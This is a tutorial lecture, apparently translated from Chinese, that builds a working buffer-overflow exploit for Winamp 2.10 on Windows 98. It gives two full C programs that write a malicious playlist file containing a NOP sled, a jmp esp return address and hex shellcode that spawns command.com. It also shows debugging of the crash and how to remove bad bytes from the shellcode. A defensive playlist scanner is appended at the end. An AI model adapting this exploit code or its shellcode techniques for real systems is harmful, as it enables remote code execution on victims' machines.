Stack Overflow Lecture Series (9)
Stack overflows on Windows: the finishing touches
A few small changes turn the test program we wrote earlier into an exploit program:
exploit.cpp
------------------------------------------------------------------------
#include <stdio.h>

int main()
{
    char buffer[640];
    /* return address: little-endian bff795a3, the jmp esp we found earlier */
    char eip[8] = "\xa3\x95\xf7\xBF";
    char shellcode[256] =
        /* stage 1: build the string "MSVCRT.DLL" on the stack and call the
           loader at bff77750 with it */
        "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"//load
        "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
        "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50"
        "\xFF\x55\xF0"
        /* stage 2: build "command.com" on the stack (the trailing '"' is
           overwritten with a zero byte) and pass it to the function at
           78019824. Note the \x01 in mov eax,78019824 (\xB8\x24\x98\x01\x78);
           that byte turns out to be the problem below. */
        "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
        "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
        "\x50\xB8\x24\x98\x01\x78\xFF\xD0"
        /* stage 3 */
        "\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *file;
    int x;
    for (x = 0; x < 580; x++)   /* NOP sled */
    {
        buffer[x] = 0x90;
    }
    buffer[x] = 0;   /* terminate, so "%s" writes exactly 580 bytes */
    file = fopen("crAsh.pls", "wb");
    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    fprintf(file, "%s", shellcode);
    fprintf(file, "\nNumberOfEntries=1");
    fclose(file);
    printf("\t created file crAsh.pls loaded with the exploit.\n");
    return 0;
}
------------------------------------------------------------------------
OK, run it and it generates a file called crash.pls. Open this playlist in Winamp and a DOS prompt should pop up. Did it?
Oops, why is it an error again?
WINAMP 在 017f:004200c3 的模块
WINAMP.EXE 中导致无效页错误。
Registers:
EAX=00000001 CS=017f EIP=004200c3 EFLGS=00000206
EBX=006da30c SS=0187 ESP=006da171 EBP=006da2f4
ECX=00000000 DS=0187 ESI=00445638 FS=444f
EDX=005b02dc ES=0187 EDI=00000001 GS=4446
Bytes at CS:EIP:
00 85 f6 7d 06 03 35 dc 23 44 00 8b 6c 24 10 3b
Stack dump:
0a006da1 8000009d 0000442a 90000000 90909090 90909090
90909090 90909090 90909090 90909090 90909090 90909090
90909090 90909090 90909090 90909090
Look at the error information: EIP is 4200c3, so it seems our shellcode has already started executing. Why would there be an invalid page fault? It looks like our shellcode has a problem.
This is where S-ICE (SoftICE) comes in handy again. Let's trace it:
ctrl-d
bpx bff795a3 (this is our jmp esp)
x
Good. Now run Winamp and open crash.pls; S-ICE catches it and we can start tracing. After one jmp esp we land on our shellcode. Keep stepping; what do you see?
Strange! Our shellcode has become shorter: it goes up to B8249801 and then there is nothing more. What is going on? It should be \xB8\x24\x98\x01\x78, so where did the \x01 go?
It looks like the enemy processed the overflowing input string: every character that cannot appear in a file name is treated as 0 (in fact this is done by the Win32 API function). Our shellcode has been truncated.
I already described the countermeasure for this kind of problem in Lecture 4, Section 1. To solve it we have to change the shellcode and remove the problematic byte: \x01
We make the following substitution:
mov eax,78019824 ----> mov eax,ffffffff
                       sub eax,87fe67db
Assembled, this gives:
\xB8\x24\x98\x01\x78 ----> \xB8\xFF\xFF\xFF\xFF
                           \x2d\xdB\x67\xFe\x87
(ffffffff - 87fe67db = 78019824, and the new encoding contains no \x01 byte.)
This gives the following new program:
/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
* modify by ipxodi 20-01-2k
* for windows98 the 2nd version and for a new shellcode.
* windows98 v 4.10.2222.A chinese version
* pII 366 with 64MB RAM(Not a good PC,en?)
* ipxodi@263.net
*/
#include <stdio.h>

int main()
{
    char buffer[640];
    /* return address: little-endian bff795a3, our jmp esp */
    char eip[8] = "\xa3\x95\xf7\xbf";
    char sploit[256] =
        /* stage 1: build the string "MSVCRT.DLL" on the stack and call the
           loader at bff77750 with it */
        "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
        "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
        "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x50\x77\xF7\xbF\x52\x8D\x45\xF4\x50"
        "\xFF\x55\xF0"
        /* stage 2: build "command.com" on the stack and pass it to the
           function at 78019824; mov eax,ffffffff / sub eax,87fe67db replaces
           mov eax,78019824 so that no \x01 byte is left for the file-name
           handling to zero out */
        "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
        "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
        "\x50\xB8\xFF\xFF\xFF\xFF\x2d\xdB\x67\xFe\x87\xFF\xD0"
        /* stage 3: forms its address with the same subtraction trick */
        "\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *file;
    int x;
    for (x = 0; x < 580; x++)   /* NOP sled */
    {
        buffer[x] = 0x90;
    }
    buffer[x] = 0;   /* terminate, so "%s" writes exactly 580 bytes */
    file = fopen("crAsh.pls", "wb");
    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    fprintf(file, "%s", sploit);
    fprintf(file, "\nNumberOfEntries=1");
    fclose(file);
    printf("\t created file crAsh.pls loaded with the exploit.\n");
    return 0;
}
OK, run it and it generates a file called crash.pls. Open this playlist in Winamp, and the result is as follows: my lovely DOS prompt appeared:
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.
D:\hacker\document\ipxodi>dir
.........................
........ (the rest is not pasted) .........
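Seen from the defending side, the whole attack rides on a single File1= value that is far longer than any real path and is made mostly of 0x90 bytes, so it is worth seeing how little it takes to spot such a playlist before a player parses it. The scanner below is an added example written for this edition; it is not part of ipxodi's or Steve Fewer's code. It walks a .pls image in memory, measures each FileN= value, and flags a value longer than MAX_PATH (260 bytes), a run of more than 16 consecutive 0x90 bytes, or any non-printable byte. The two thresholds, the benign playlist, and the constructed crAsh.pls-shaped sample (580 NOPs, the return address from the article, then 8 bytes of 0xCC as filler in place of a payload) are all assumptions made here, not values taken from Winamp.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Thresholds chosen for this example (assumptions, not Winamp's values). */
#define MAX_PATH_LEN  260   /* Win32 MAX_PATH: no real path value should exceed it */
#define NOP_RUN_LIMIT 16    /* a longer run of 0x90 bytes is a NOP sled, not a path */

struct pls_verdict {
    size_t longest_value;   /* longest FileN= value, in bytes */
    size_t longest_nop_run; /* longest run of consecutive 0x90 bytes in a value */
    size_t nonprintable;    /* non-printable bytes seen in values */
    int    suspicious;      /* 1 if any threshold was exceeded */
};

/* Scan a .pls image held in memory. The data may contain any byte value
 * (including 0x00), so it is handled by length and never as a C string. */
struct pls_verdict scan_pls(const unsigned char *data, size_t len)
{
    struct pls_verdict v = {0, 0, 0, 0};
    size_t i = 0;

    while (i < len) {
        size_t start = i;
        while (i < len && data[i] != '\n')
            i++;
        size_t line_len = i - start;
        if (i < len)
            i++;                              /* step over the '\n' */
        if (line_len > 0 && data[start + line_len - 1] == '\r')
            line_len--;                       /* tolerate CRLF */

        /* Only "FileN=..." lines carry a path; skip [playlist], Title, etc. */
        if (line_len < 5 || memcmp(data + start, "File", 4) != 0)
            continue;
        const unsigned char *eq = (const unsigned char *)memchr(data + start, '=', line_len);
        if (eq == NULL)
            continue;

        const unsigned char *val = eq + 1;
        size_t vlen = (data + start + line_len) - val;
        if (vlen > v.longest_value)
            v.longest_value = vlen;

        size_t run = 0;
        for (size_t k = 0; k < vlen; k++) {
            run = (val[k] == 0x90) ? run + 1 : 0;
            if (run > v.longest_nop_run)
                v.longest_nop_run = run;
            if (!isprint(val[k]))
                v.nonprintable++;
        }
    }

    v.suspicious = v.longest_value > MAX_PATH_LEN
                || v.longest_nop_run > NOP_RUN_LIMIT
                || v.nonprintable > 0;
    return v;
}

/* Constructed sample shaped like the crAsh.pls above: 580 NOPs, the return
 * address from the article, then 8 bytes of 0xCC as filler (not shellcode).
 * Returns the image length, or 0 if the buffer is too small. */
size_t build_constructed_sample(unsigned char *buf, size_t cap)
{
    static const char head[] = "[playlist]\nFile1=";
    static const char ret[]  = "\xa3\x95\xf7\xbf";
    static const char tail[] = "\nNumberOfEntries=1\n";
    size_t n = 0;

    if (cap < sizeof head - 1 + 580 + 4 + 8 + sizeof tail - 1)
        return 0;
    memcpy(buf + n, head, sizeof head - 1); n += sizeof head - 1;
    memset(buf + n, 0x90, 580);             n += 580;
    memcpy(buf + n, ret, 4);                n += 4;
    memset(buf + n, 0xCC, 8);               n += 8;
    memcpy(buf + n, tail, sizeof tail - 1); n += sizeof tail - 1;
    return n;
}

struct pls_verdict scan_constructed_sample(void)
{
    unsigned char img[1024];
    size_t n = build_constructed_sample(img, sizeof img);
    return scan_pls(img, n);
}

struct pls_verdict scan_benign_sample(void)
{
    static const char pls[] = "[playlist]\nFile1=C:\\Music\\song.mp3\nNumberOfEntries=1\n";
    return scan_pls((const unsigned char *)pls, sizeof pls - 1);
}

int main(void)
{
    struct pls_verdict bad = scan_constructed_sample(), ok = scan_benign_sample();
    printf("constructed: longest=%zu nops=%zu nonprint=%zu suspicious=%d\n",
           bad.longest_value, bad.longest_nop_run, bad.nonprintable, bad.suspicious);
    printf("benign:      longest=%zu nops=%zu nonprint=%zu suspicious=%d\n",
           ok.longest_value, ok.longest_nop_run, ok.nonprintable, ok.suspicious);
    return 0;
}
```

The length check alone is the one that matters for this bug: a parser that refused a File= value longer than MAX_PATH would never have copied 580 bytes into a fixed stack buffer. The NOP-run and non-printable counters are there to show how crude such a payload looks as data, which is what makes it easy to flag in a playlist or in a download scanner.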